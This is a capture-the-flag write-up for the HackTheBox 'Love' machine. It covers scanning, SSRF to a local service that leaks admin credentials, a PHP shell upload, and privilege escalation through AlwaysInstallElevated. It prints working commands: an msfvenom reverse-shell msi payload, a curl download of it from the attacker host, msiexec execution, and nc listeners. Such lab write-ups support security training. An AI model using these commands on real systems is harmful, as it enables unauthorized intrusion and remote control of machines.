Love Writeup Hackthebox

### Enumeration Performed Nmap Scan finding that there are several ports open ``` Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-01 21:23 CEST Nmap scan report for love.htb (10.10.10.239) Host is up (0.061s latency). Not shown: 993 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27) | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set |_http-title: Voting System using PHP 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 443/tcp open ssl/http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27) |_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 |_http-title: 403 Forbidden | ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in | Not valid before: 2021-01-18T14:00:16 |_Not valid after: 2022-01-18T14:00:16 |_ssl-date: TLS randomness does not represent time | tls-alpn: |_ http/1.1 445/tcp open microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP) 3306/tcp open mysql? | fingerprint-strings: | NULL, SMBProgNeg: |_ Host '10.10.14.201' is not allowed to connect to this MariaDB server 5000/tcp open http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27) |_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 |_http-title: 403 Forbidden 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port3306-TCP:V=7.91%I=7%D=5/1%Time=608DAAC6%P=x86_64-pc-linux-gnu%r(NUL SF:L,4B,"G\0\0\x01\xffj\x04Host\x20'10\.10\.14\.201'\x20is\x20not\x20allow SF:ed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(SMBProgNeg,4 SF:B,"G\0\0\x01\xffj\x04Host\x20'10\.10\.14\.201'\x20is\x20not\x20allowed\ SF:x20to\x20connect\x20to\x20this\x20MariaDB\x20server"); Service Info: Hosts: www.example.com, LOVE, www.love.htb; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 2h52m49s, deviation: 4h02m32s, median: 32m47s | smb-os-discovery: | OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3) | OS CPE: cpe:/o:microsoft:windows_10::- | Computer name: Love | NetBIOS computer name: LOVE\x00 | Workgroup: WORKGROUP\x00 |_ System time: 2021-05-01T12:56:56-07:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2021-05-01T19:56:52 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 55.80 seconds ``` Then after learning about the ports opened I decided to open it up on the browser to see what's in port 80, and I found a voting system, which is in the main site `love.htb` but then from the nmap scan I saw this line `commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in` which states on commonName that there is another subdomain named `staging.love.htb` , and I opened it on the web, and inside it is a `secure file scanner` and from the website there mentioned a link which lead to a demo for the file scanner `beta.php` is the file name , and it also said `Specify the file url:` , where I had to try RFI of somesort where I have to read the file inside the localhost in any of the ports hosted from there , as in port `5000` there is another site running , if I access it in my web it doesn't show a thing but if I try putting `http://127.0.0.1:5000/` in the input field to scan a file it shall show something. ![](https://i.imgur.com/bhTQNKU.png) ### Gaining Access So from there I got the password and the username , and my guess is it's for the voting system, the creds are `admin: @LoveIsInTheAir!!!!` now my next shot is to try gaining access to the voting system , and we did but after performing a dirsearch and found out there is another directory named `/admin/` and from there I got access, and I tried uploading an image and I was able to upload shell, so the admin panel is vulnerable to file upload RCE , and I got reverse shell ! BOOM!! ``` windows-php-reverse-shell [master●●] % nc -lvnp 1234 Connection from 10.10.10.239:60722 b374k shell : connected Microsoft Windows [Version 10.0.19042.867] (c) 2020 Microsoft Corporation. All rights reserved. C:\xampp\htdocs> whoami love\phoebe ``` and we got shell as phoebe , so now I just go grab user.txt , cauze phoebe is probably the user :) ``` C:\Users\Phoebe\Desktop>type user.txt type user.txt c21311735d9de729263332fe8c495be2 ``` So now since I got access, I evelate my privileges, and for that I upload winpeas and then use it to enumerate for anything that will lead me to root, and from winpeas result I get `AlwaysInstallElevated set to 1 in HKLM!` and `AlwaysInstallElevated set to 1 in HKCU!` and from hacktricks we find a method for gaining root from the mentioned Privilege, so I create msi payload and then upload it and then execute it. ### Elevating Privileges I created a reverse shell in format of .msi which will be executed with msiexec and then get us a shell back , and for the reverse shell I use msfvenom : ``` [tahaafarooq@cyberwarriors love]$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.9 LPORT=1337 -f msi -o reverse.msi ``` and then I started a server in python and , downloaded the msi file and then executed it as below : ``` [tahaafarooq@cyberwarriors love]$ python3 -m http.server Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ... 10.10.10.239 - - [04/Aug/2021 15:28:52] "GET /reverse.msi HTTP/1.1" 200 ``` ``` C:\tmp>curl http://10.10.14.9:8000/reverse.msi -o reverse.msi curl http://10.10.14.9:8000/reverse.msi -o reverse.msi % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 156k 100 156k 0 0 156k 0 0:00:01 0:00:01 --:--:-- 93801 C:\tmp>msiexec /quiet /qn /i setup.msi msiexec /quiet /qn /i setup.msi C:\tmp>msiexec /quiet /qn /i reverse.msi This installation package could not be opened. Verify that the package exists and that you can access it, or contact the application vendor to verify that this is a valid Windows Installer package. msiexec /quiet /qn /i reverse.msi C:\tmp> ``` and from my listener : ``` [tahaafarooq@cyberwarriors love]$ nc -lvnp 1337 Connection from 10.10.10.239:64745 Microsoft Windows [Version 10.0.19042.867] (c) 2020 Microsoft Corporation. All rights reserved. C:\WINDOWS\system32> ``` Administrator Owned ! ``` C:\Users\Administrator\Desktop>type root.txt type root.txt 646ee083ec394900f5808e495c6c616b ``` ## {LOVE PWNED!}